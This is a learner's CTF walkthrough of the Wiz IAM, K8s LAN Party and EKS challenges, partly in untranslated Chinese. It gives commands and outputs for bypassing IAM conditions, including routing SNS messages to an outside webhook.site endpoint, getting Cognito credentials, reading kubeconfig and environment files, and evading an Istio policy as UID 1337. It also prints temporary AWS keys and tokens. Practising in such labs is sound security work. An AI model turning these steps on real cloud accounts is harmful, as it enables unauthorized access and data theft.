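WIZ-IAM

I'm learning cloud security. The products of the major cloud vendors have a lot in common,

so I'm using this AWS range as a chance to learn.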

0x00 Buckets of Fun

We all know that public buckets are risky. But can you find the flag?

The challenge gives us the following IAM policy.

IAM: Identity and Access Management

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": "*",
          "Action": "s3:GetObject",
          "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
          "Effect": "Allow",
          "Principal": "*",
          "Action": "s3:ListBucket",
          "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
          "Condition": {
            "StringLike": {
              "s3:prefix": "files/*"
            }
          }
        }
      ]
    }



The Resource is arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*, so the bucket's objects can be reached through https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/

The policy also allows the s3:ListBucket Action for the files/* prefix, so anyone can list what is under files/.

That gives us the first flag: https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/files/flag1.txt

0x01 Google Analytics

We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong?

Join our queue and get the secret flag.

Again we are given an IAM policy:

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": "*",
          "Action": ["sqs:SendMessage", "sqs:ReceiveMessage"],
          "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
      ]
    }

Two Actions I had not come across before show up here: sqs:SendMessage and sqs:ReceiveMessage.

SQS: Simple Queue Service, a managed message queue service.



After some reading, I learned that aws-cli can be used to interact with it: https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html

    aws configure

    aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

    {
      "Messages": [
        {
          "MessageId": "9a731184-dd46-411d-9900-9f28fc5be03d",
          "ReceiptHandle": "AQEBNqqEvyBmPojhkHO36b5Bi05EXk2sjTnaaanJpL7GXIx+oKG1ZzjQ3u8cgTpmIg1KvAnPtRsVLvjJf6S1tJocHHznS0E4zCefqP5v+4ffO8qQwDpyG+l7ljuI4V+/7/CjWZJj7Bc7We2LNecb3uQJ3qI9gkBGTlQFJQE5/8pdNNhrrMqEOSgrDp2am1sgevpJq4loIxbM7GgVmVDp88MyH1Bl4QwRApPFQJoZKlS80Ff3riqceF+bFH8joraOqpKTc4oHXiNYLZsZPMKof65lStB2Y+RIiFTO39WfShVrXuhQpn6eUGrRztyOHzIk2xGQJwUSK9JReBRymV3Y1p7Q6SMh5ZeEPNhG8URggGVG/yUXbk64UL8GEBNSkbUEJlTYPdAO4tWuj4xB9VtU4HSqlwz9Z53GLjCRzlV7lqK8bGc=",
          "MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
          "Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}"
        }
      ]
    }

The flag is at https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
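
The Body field of each SQS message is itself a JSON string, so it has to be parsed a second time to get at the URL. A minimal Python sketch of that step follows; the function name extract_urls and the sample payload are illustrative assumptions, not part of the challenge.

```python
import json


def extract_urls(receive_message_output: str) -> list[str]:
    """Return the URL field from every message in `aws sqs receive-message` output."""
    response = json.loads(receive_message_output)
    urls = []
    for message in response.get("Messages", []):
        # Body is a JSON document serialized as a string, so decode it again.
        body = json.loads(message["Body"])
        urls.append(body["URL"])
    return urls


# Hypothetical sample shaped like the output shown above.
sample = json.dumps({
    "Messages": [{
        "MessageId": "example-id",
        "Body": json.dumps({
            "URL": "https://example.invalid/page.html",
            "User-Agent": "example-agent",
            "IsAdmin": True,
        }),
    }]
})
print(extract_urls(sample))
```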

0x02 Enable Push Notifications

We got a message for you. Can you get it?

The IAM policy is as follows:

    {
      "Version": "2008-10-17",
      "Id": "Statement1",
      "Statement": [
        {
          "Sid": "Statement1",
          "Effect": "Allow",
          "Principal": {
            "AWS": "*"
          },
          "Action": "SNS:Subscribe",
          "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
          "Condition": {
            "StringLike": {
              "sns:Endpoint": "*@tbic.wiz.io"
            }
          }
        }
      ]
    }

SNS: Simple Notification Service, a managed publish/subscribe messaging service.

I put the command together from the help docs; the result:

    aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol email --notification-endpoint AWS@tbic.wiz.io

    {
      "SubscriptionArn": "pending confirmation"
    }



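After trying it, I found that the condition "sns:Endpoint": "*@tbic.wiz.io" is flawed.

The command below bypasses it. The condition is only a wildcard pattern match on the raw string; the endpoint is never parsed as a URL, so anything that ends in @tbic.wiz.io passes.

    aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://webhook.site/279f5aeb-fc79-4539-9b95-1fbf7493ac2d/\?a\=@tbic.wiz.io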
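
To see why both endpoints pass the condition, here is a small Python approximation of StringLike matching, where * stands for any run of characters and ? for a single character. It is a sketch of the matching rule only, not AWS's implementation, and the helper name string_like is made up for this example.

```python
import re


def string_like(pattern: str, value: str) -> bool:
    """Approximate IAM StringLike: '*' matches any run of characters, '?' exactly one."""
    regex = "".join(
        ".*" if ch == "*" else "." if ch == "?" else re.escape(ch)
        for ch in pattern
    )
    return re.fullmatch(regex, value, flags=re.DOTALL) is not None


PATTERN = "*@tbic.wiz.io"
email = "AWS@tbic.wiz.io"
webhook = "https://webhook.site/279f5aeb-fc79-4539-9b95-1fbf7493ac2d/?a=@tbic.wiz.io"
plain_webhook = "https://webhook.site/279f5aeb-fc79-4539-9b95-1fbf7493ac2d/"

print(string_like(PATTERN, email))          # the intended use
print(string_like(PATTERN, webhook))        # the bypass: only the suffix matters
print(string_like(PATTERN, plain_webhook))  # no suffix, no match
```

The pattern never looks at the scheme or host, which is why a query string ending in @tbic.wiz.io is enough.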

1 2 3 4 5 6 7 8 9 10 11 12 { "Type" : "SubscriptionConfirmation" , "MessageId" : "f1bd1ba6-8dd5-4052-aed7-b90f2fddd489" , "Token" : "2336412f37fb687f5d51e6e2425ba1f259d6d69878bcbe048b4f189264d5f577afbcd40e86bd49ef15225797cc9c57593fd7b5e51592e0736e5ba7d545409e009794dd0fec22c741119b893267c8e6f451240d4965780a5298ca4ab37d399c82c14ceef236ec6e5cf3aa14bbf2dd08a7e3b4a65a755e0e4741b8ad759699e660" , "TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications" , "Message" : "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message." , "SubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f259d6d69878bcbe048b4f189264d5f577afbcd40e86bd49ef15225797cc9c57593fd7b5e51592e0736e5ba7d545409e009794dd0fec22c741119b893267c8e6f451240d4965780a5298ca4ab37d399c82c14ceef236ec6e5cf3aa14bbf2dd08a7e3b4a65a755e0e4741b8ad759699e660" , "Timestamp" : "2024-08-18T09:53:19.516Z" , "SignatureVersion" : "1" , "Signature" : "rAYTS+2xMBwV+51edEWKkdPWgztvK7j+VuBRJwfiZCcu25bJwmmD7DflbizPFEvHz3p+1QGoXrRxlHYoIMrzlUItQKDMVXo6rMoxhsj2bgHiOjyOFPORR8dVrAHeYg4J2gpuZJEFJk0/IQDJW0EZRubqYnVgX6m28vLW4LnBtRP20cgxe9iWm+LhaQGKd+0H8/xuHxCUSuLmLe08dCesT7OTQ97Zc356PF2X3PxLvSKVpmxWAjTRvTE4irYboyn9la6GK/b/HFkmXfOisACaFtS5PUjcTAUmi0G7ioe7xxbu9nYUcXf+knUqUpPZIL+ITAkcKWmNpgkpQMM/+WJV2w==" , "SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem" }



拿到 SubscribeURL,访问这段 url 意味着 confirm

0x03 Admin only?

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": "*",
          "Action": "s3:GetObject",
          "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
          "Effect": "Allow",
          "Principal": "*",
          "Action": "s3:ListBucket",
          "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
          "Condition": {
            "StringLike": {
              "s3:prefix": "files/*"
            },
            "ForAllValues:StringLike": {
              "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
            }
          }
        }
      ]
    }

Let's try it:

    aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/

    An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied

This calls for a bit of trickery.

My first thought was that the lower-level s3api would be needed here.

I really could not work out what the trick would look like, so I went and read a writeup.



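That led me to https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html#reference_policies_condition-multi-valued-context-keys

In other words, leaving PrincipalArn empty bypasses the check: a ForAllValues condition also evaluates to true when the key is missing from the request, and an anonymous request carries no aws:PrincipalArn.

Use --no-sign-request to send the request as an anonymous user.

    aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
    2023-06-08 03:15:43         42 flag-as-admin.txt
    2023-06-09 03:20:01      81889 logo-admin.png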
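
The ForAllValues behaviour is easy to reproduce: "every value in the request matches" is vacuously true when the request has no values at all. The Python sketch below models that rule with fnmatchcase as a stand-in for StringLike; the function name and the second ARN are assumptions made for this illustration only.

```python
from fnmatch import fnmatchcase

ADMIN_ARN = "arn:aws:iam::133713371337:user/admin"


def for_all_values_string_like(request_values: list[str], patterns: list[str]) -> bool:
    """True if every request value matches at least one pattern (vacuously true when empty)."""
    return all(
        any(fnmatchcase(value, pattern) for pattern in patterns)
        for value in request_values
    )


# Signed request from some other (hypothetical) user: denied.
print(for_all_values_string_like(["arn:aws:iam::111122223333:user/player"], [ADMIN_ARN]))
# Anonymous request: aws:PrincipalArn is absent, so there is nothing to fail on.
print(for_all_values_string_like([], [ADMIN_ARN]))
```

A plain StringLike or StringEquals on aws:PrincipalArn would not have this gap, because a missing key does not satisfy those operators.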

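Alternatively, just open it in a browser (that request is not signed either).

Note that the prefix here is not taken from the path; it is passed as a GET parameter.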

https://thebigiamchallenge-admin-storage-abf1321.s3.amazonaws.com/?prefix=files/

Do I know you?

We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.

This challenge is about AWS Cognito.

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "VisualEditor0",
          "Effect": "Allow",
          "Action": ["mobileanalytics:PutEvents", "cognito-sync:*"],
          "Resource": "*"
        },
        {
          "Sid": "VisualEditor1",
          "Effect": "Allow",
          "Action": ["s3:GetObject", "s3:ListBucket"],
          "Resource": [
            "arn:aws:s3:::wiz-privatefiles",
            "arn:aws:s3:::wiz-privatefiles/*"
          ]
        }
      ]
    }



Here the challenge quietly placed the IdentityPoolId (the identity pool ID) in the page's front-end code.

I asked GPT how to proceed.

    aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

    {
      "IdentityId": "us-east-1:157d6171-ee14-cd36-047a-8788f51250c0"
    }

    aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-ee14-cd36-047a-8788f51250c0

    {
      "IdentityId": "us-east-1:157d6171-ee14-cd36-047a-8788f51250c0",
      "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXCXWSKNM7",
        "SecretKey": "WiRNveYg1JBx9lSK1W76QaFRSEJxL9QOY1NLX0Tb",
        "SessionToken": "IQoJb3JpZ2luX2VjECUaCXVzLWVhc3QtMSJIMEYCIQDDK99xsDcJEDxGgSUtfJqsngXCOHM+38zyZ318VqPHeAIhAKJPScFZzXbU/QQDhJqMzt3IEv+FFFPwkSXdoAjLnjykKsgFCC4QABoMMDkyMjk3ODUxMzc0IgxurT/NF1jhby5aLVkqpQWyJIxHQNiMV9FK/WijNS/2tjt9YfSey9a0XtirbJ0vzag6u7jPLHgPIgU9ujmqEY1WMHP05x86mwvJtuDGAIpTHdI+Qs91bnf4pB8d7zs8xBnlNqyflafAaR7XK+m7fccYU5t1uEYkoyZQ8LtVByzB7ldC2sCwe48jeOzUOFDqkh8xU7YkgCzsRwthrfgUG/FfjudNBdXdJOaITQGO4pCPjGnZLDKI+Ey7Mngp6LSV77fCL7omGqaPLnPOC99aJFcw7RFqgbrNwKqK2SSplR5/YLQaAqn+coFV1DMzZ+Hp3FpBhLPeR9Ks1TO9vYnn9T6PzLhgqTuuRZTNJNE3IS4PrTasv5F2Pxh0IwQKx2EZ+jO0lOFUAUEl0kfjYne8n8Ph8hmQxbq09ZEJZJ7herFdyZ4UT0ZfrVwQ7gPz6Y6gk5kfZAO0yZbYy6Q109ru+aQzIcEAPKXqhPUrMcZ37g8DD7pnotkAo5tPpOkBmVbozMQvWDsNwwrCv5G/LqtHxkLfkqCtuprbXPW96G83yisiuure0iXBaPddDNKNFulUR5nf77QwsQCZNQqdpQXEyiFGpWbUlSYh6iHmC5o08C83IMW5b0tqh8gw2/txqmgYemd1YlIH9RfYgDNiAwHykHWm8FbijQM9JOwA7vB/MSacrBEVDTcF2XjT7gZwMRb9+1iRVMZaBJ7864qQ+UnA5eeZkCiRZyh9qOT3CU6NAD7xBOOjo6ESPd3ImnpFg6ueh0Ex33EH/eHLgagb7fUnFF75T9LYz3SqvEfTTjm9t15kVH5HaVklOQgFT+sujGzvCz5JIRm3CM8txDQO6pEMHybH4kL8sGwJRMBoaL3OkOMju0XSwXUGy5OMKiUKe6dmsD6Ra4heUfkXsRRUSSFJqAQwSdxqATC21oe2BjrdAr+lPeonnDx0clSjqH8A1FFMqh8kR0jLXTOmfRw1eDW2ok7+ajV7mZ4VkWTgFjpkKwWJ1HlGLucGmWZASkBfz7dFNFPUGvu886nBLvCHeen3qXHGuUJLFmVhWACXjP9bVvEf0Y/JOavhI8NantU+CalvbA55bTW8qHcBI57SDjPvVabA5+aLEY7wx2aaYowTCdgbwZCDnP+XhCvigqmYTpkk2pNPmb2geUUo/taE/IQc7BgTN6+ifUoNhgD44VtjuSYWKPxybfOhkznNi/kyHKlxf9R58nZvLq7inb51ERoHKC4i/TubvOwz6W8eTn2E+P1xQeUHLazCdLDdzo8I8BrDfQttK2F3UYoUR1hNeEsySD8M5BZtdmQTBaEqB1NvwsGn2PKhktCeMeoa6ydguqzFoggxqL/p0bPoBk9c3KNFJ/MB0XF5l2nNsX4/z+9pTTrOS4qAyZmylsMTPgA=",
        "Expiration": "2024-08-18T21:38:14+08:00"
      }
    }

With the temporary AWS credentials in hand, configure them as a profile and use it.

    aws s3 cp s3://wiz-privatefiles/flag1.txt 1.txt --profile test
    download: s3://wiz-privatefiles/flag1.txt to ./1.txt
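
Temporary credentials only work when the session token is configured along with the key pair. One way to set up the test profile is to render a section for ~/.aws/credentials; the Python sketch below does that from the Credentials object returned by get-credentials-for-identity. The function name and the placeholder values are assumptions, and the sketch only builds the text rather than writing to disk.

```python
import configparser
import io


def render_profile(profile: str, credentials: dict) -> str:
    """Render one AWS credentials-file section from a Cognito Credentials object."""
    config = configparser.ConfigParser(interpolation=None)
    config[profile] = {
        "aws_access_key_id": credentials["AccessKeyId"],
        "aws_secret_access_key": credentials["SecretKey"],
        # Without this line the temporary key pair is rejected.
        "aws_session_token": credentials["SessionToken"],
    }
    buffer = io.StringIO()
    config.write(buffer)
    return buffer.getvalue()


# Placeholder values; substitute the real output of get-credentials-for-identity.
example = {
    "AccessKeyId": "ASIAEXAMPLE",
    "SecretKey": "example-secret",
    "SessionToken": "example-session-token",
}
print(render_profile("test", example))
```

Appending the rendered section to ~/.aws/credentials makes --profile test usable as in the command above.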

One final push

Anonymous access no more. Let’s see what can you do now.

Now try it with the authenticated

role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "Federated": "cognito-identity.amazonaws.com"
          },
          "Action": "sts:AssumeRoleWithWebIdentity",
          "Condition": {
            "StringEquals": {
              "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
            }
          }
        }
      ]
    }

Note that b73cb2d2-0d00-4e77-8e80-f99d9c13da3b is the same ID as in the previous challenge, so this challenge evidently continues from that one.

Anonymous login is no longer enough, though, so we have to go through the given role.

    aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

    {
      "IdentityId": "us-east-1:157d6171-ee1b-c7b5-9a07-71eb7be0ae83"
    }

    aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-ee14-cd36-047a-8788f51250c0



We need a token here, which takes some digging through aws cognito-identity help (silly GPT even told me the CLI cannot fetch a web token).

    aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-ee1b-c7b5-9a07-71eb7be0ae83

    {
      "IdentityId": "us-east-1:157d6171-ee1b-c7b5-9a07-71eb7be0ae83",
      "Token": "eyJraWQiOiJ1cy1lYXN0LTEtNiIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYi1jN2I1LTlhMDctNzFlYjdiZTBhZTgzIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MjM5ODkwNDEsImlhdCI6MTcyMzk4ODQ0MX0.gPWOvNssHihKyUYa7hZoO5L1XrfIZ8fFb2_e1ohpzIOs75reMrdFKaLWbb3oSvvGxMSEQnbf8zc7Z93zjVCOsvzpPiHdAfhAdoriyWROx3Lf49Gh1zMxcTSjP3MJZt3vkhqcf_v9Exo4lIgzdlw_mVRMaqpuUnvn4UVZUZjsIjxGtclANRQtfRvlnZfu276_gYdYa7eAY_bVe1U1njFzAX7ujQ1Wb2IUp3Dqy2LYpEA0fGsV7fe98MoHaiS4PH_avYdX0dnCSRk0bdNdVMm66eB4STYLS99Cdl04TS8AjAmPEAf-wX3p_u1Xx-_aIIWE_BszQN4yN4QlTuXX6yzrQg"
    }
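
The Token is a JWT, and its payload can be read without verifying the signature, which is handy for checking the aud claim that the trust policy's cognito-identity.amazonaws.com:aud condition is compared against. A minimal Python sketch follows; the helper names are hypothetical, and the sample token is built locally for illustration rather than taken from the output above.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode base64url data whose '=' padding was stripped, as JWTs do."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def decode_jwt_payload(token: str) -> dict:
    """Return the claims of a JWT without checking its signature."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


def make_unsigned_sample(claims: dict) -> str:
    """Build a JWT-shaped string for demonstration; the signature is a placeholder."""
    def encode(obj: dict) -> str:
        raw = json.dumps(obj).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{encode({'alg': 'none'})}.{encode(claims)}.placeholder"


sample_claims = {
    "aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b",
    "iss": "https://cognito-identity.amazonaws.com",
}
sample_token = make_unsigned_sample(sample_claims)
print(decode_jwt_payload(sample_token)["aud"])
```

Passing the real Token value to decode_jwt_payload should show the claims STS will evaluate.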



Next comes STS.

STS: Security Token Service

    aws sts assume-role-with-web-identity \
        --role-arn <value> \
        --role-session-name <value> \
        --web-identity-token <value>

    {
      "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXIOXJTOHO",
        "SecretAccessKey": "GEpBCgq/LgTWdSTNVia9DXpPw8rRLYMoptEMMU2A",
        "SessionToken": "IQoJb3JpZ2luX2VjECYaCXVzLWVhc3QtMSJHMEUCIQDR7eqFvbHumZfmG4iNfS7U7UI/lvxBUgLL43PjbgDZ1gIgRtM1O/PC3kNSh4QdhuE6ZuP4yChDMh/uxh4wjqR27BgqhgMILxAAGgwwOTIyOTc4NTEzNzQiDB4bFWP0IaW7kmtrYSrjAtH8ru4lL9cwCJuZmZ5zLmstaXkmjrP8+LfDwLw3/+q2IFOgGyVxuNoP1ccjyX7s+75n6o2bTMopRDtd2nxrZL1ocWxWvVtRNJjQU4qZUFYxBZZqR0GaL/NE0LwjWJsyD05XpYofzfzHGeZB/XJW03IlxH9mEJA+LippKOIIeow7u49C9Xivvsf5Q+tO4POk3/RJe6cdsiBhhlJjxuPs8Y+y8bxRRRB9dQHRv3Y5oaQbAyr4z43pH3O+aLi+6oS8H4wMwYIoy/lAroenS8Bq2jGNd53aSZzPHYZs/kRfXCZp6u2XGeUIKCr6Q+t1q39O/DdmKn1s4iaYro1dH7H74mPWWodrW+2Ll9Q/3vBJYv0bFXx8Nk2IS2pW2M3PRJLiAP57fv9IFix5khxBiwvKNybPNuNYqzH+G0xul8m0/Bu98257Bpp1lYnSmGorIe977eZrlFaveZy5cmpHnpfo84j2SVMw7fSHtgY6hwIYcFZ99tQoB+kGkyiNm7SDzelCu3qdq57HAX/wD0sWBOEVzAvupYOjwWyB+QSqOx20hsGwaoisS0oLdasd/+jPuIYu9ITATv/sfcl6JIcdU1m+Gr6IMne5floQX9N1tjSfCEB8b6XsBIilm8VllD/oiM6DrI2MiXPnDvormhMw7uPd1c2S4S0KYAkRMLd5LXqV7nTUM1uP1WMCzYlaIBZGO+N82mdcyipPjnhduZcr6IOPeopAMb4LhWmlBPHzLzUk5rymPMM9peDCUAwpFVRxyZc8k11RnV05sHbapnKoMjRfUoiTAotrAQQuJ/iweQeQV00tPuC7KulEnzUtJOnyjys7KVdaRA==",
        "Expiration": "2024-08-18T14:43:09+00:00"
      },
      "SubjectFromWebIdentityToken": "us-east-1:157d6171-ee1b-c7b5-9a07-71eb7be0ae83",
      "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:telll",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/telll"
      },
      "Provider": "cognito-identity.amazonaws.com",
      "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
    }

After that, ls shows which buckets exist.

    aws s3 ls --profile telll
    2024-06-06 14:21:35 challenge-website-storage-1fa5073
    2024-06-06 16:25:59 payments-system-cd6e4ba
    2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
    2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
    2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
    2023-06-05 21:28:31 wiz-privatefiles
    2023-06-05 21:28:31 wiz-privatefiles-x1000

K8S LAN Party

The last level involves Kyverno. I really could not understand what a dynamic admission webhook is, so I stopped there.

Welcome to the Kubernetes LAN Party! A CTF designed to challenge your Kubernetes hacking skills through a series of critical network vulnerabilities and misconfigurations. Challenge yourself, boost your skills, and stay ahead in the cloud security game.

DNSing with the stars

You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have “loaded your machine with dnscan to ease this process for further challenges.







dnscan

dnscan calls LookupAddr to reverse-resolve host names from IP addresses.

The k8s subnet

I looked through the files and saw nothing, but running env revealed it right away.

    player@wiz-k8s-lan-party:~$ env
    KUBERNETES_SERVICE_PORT_HTTPS=443
    KUBERNETES_SERVICE_PORT=443
    USER_ID=fa5a935b-423f-4b0f-be27-df279b966bec
    HISTSIZE=2048
    PWD=/home/player
    HOME=/home/player
    KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
    HISTFILE=/home/player/.bash_history
    TMPDIR=/tmp
    TERM=xterm-256color
    SHLVL=1
    KUBERNETES_PORT_443_TCP_PROTO=tcp
    KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
    KUBERNETES_SERVICE_HOST=10.100.0.1
    KUBERNETES_PORT=tcp://10.100.0.1:443
    KUBERNETES_PORT_443_TCP_PORT=443
    HISTFILESIZE=2048
    _=/usr/bin/env

It then occurred to me that reading resolv.conf works too, although it gives less information.

    player@wiz-k8s-lan-party:~$ cat /etc/resolv.conf
    search k8s-lan-party.svc.cluster.local svc.cluster.local cluster.local us-west-1.compute.internal
    nameserver 10.100.120.34
    options ndots:5

Hello?

Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.



有边车容器在,此时需要查看网络连接情况

使用 netstat -ano arp -ae 查看

发现 ip 10.100.171.123

dnscan 也可以探测到



此时直接 curl 访问是空的,并不知道路径等信息

但是我们已经有这个 shell,可以直接监控 tcp 流量

才做两关就给证书?

Exposed File Share

The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦️.

This one needs the hint; without it I would not have known where to start.

The description mentions data storage, but searching the file system turned up no credentials.

NFS: Network File System

    $ mount | grep nfs
    fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.57.108,local_lock=none,addr=192.168.124.98)

    $ df -hT | grep nfs
    fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ nfs4 8.0E 0 8.0E 0% /efs

The hint also says that parameters must be supplied, otherwise nothing can be retrieved.

The following NFS parameters should be used in your connection string: version, uid and gid

When finally reading the flag, the path has to be written with two slashes, //flag.txt. I also guessed that uid and gid should both be 0.

    $ nfs-ls 'nfs://192.168.124.98/?version=4.1'
    ---------- 1 1 1 73 flag.txt

    $ nfs-cat 'nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4.1&uid=0&gid=0'
    wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}





The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.

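Here we are given a k8s config.

The key point is that it is an AuthorizationPolicy.

    apiVersion: security.istio.io/v1beta1
    kind: AuthorizationPolicy
    metadata:
      name: istio-get-flag
      namespace: k8s-lan-party
    spec:
      action: DENY
      selector:
        matchLabels:
          app: "{flag-pod-name}"
      rules:
      - from:
        - source:
            namespaces: ["k8s-lan-party"]
        to:
        - operation:
            methods: ["POST", "GET"]

hint: Try examining Istio’s IPTables rules.

It points us to the iptables configuration.

Meanwhile dnscan discovers a new address.

A direct request is denied, which matches the policy, so the policy has to be bypassed.

https://github.com/istio/istio/issues/4286

    istio:x:1337:1337::/home/istio:/bin/sh

Just su to the istio user and send the request again. Istio's iptables rules do not redirect traffic owned by UID 1337 (the sidecar's own user) to the proxy, so a request made as that user is never checked against the policy.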

Who will guard the guardians?

Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.

    apiVersion: kyverno.io/v1
    kind: Policy
    metadata:
      name: apply-flag-to-env
      namespace: sensitive-ns
    spec:
      rules:
        - name: inject-env-vars
          match:
            resources:
              kinds:
                - Pod
          mutate:
            patchStrategicMerge:
              spec:
                containers:
                  - name: "*"
                    env:
                      - name: FLAG
                        value: "{flag}"

I could not make sense of it, so as a first step I scanned for services with dnscan again.

    10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
    10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
    10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
    10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
    10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
    10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.

EKS Cluster Games

ECR (Elastic Container Registry): AWS's registry service for Docker container images.

Welcome To The Challenge

You’ve hacked into a low-privileged AWS EKS pod. Use the web terminal below to find flags across the environment. Each challenge runs in a different Kubernetes namespaces with varying permissions.

All K8s resources are crucial; challenges are based on real EKS misconfigurations and security issues.

Click “Begin Challenge” on your desktop, and for guidance, click the question mark icon for useful cheat sheet.

Good luck!





Secret Seeker

Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?

    {
      "secrets": ["get", "list"]
    }

As usual, start by collecting credentials.

    cat .kube/config
    cat .kube/config.bak

    apiVersion: v1
    clusters:
    - cluster:
        certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
        server: https://10.100.0.1
      name: localcfg
    contexts:
    - context:
        cluster: localcfg
        namespace: challenge1
        user: user
      name: localcfg
    current-context: localcfg
    kind: Config
    preferences: {}
    users:
    - name: user
      user:
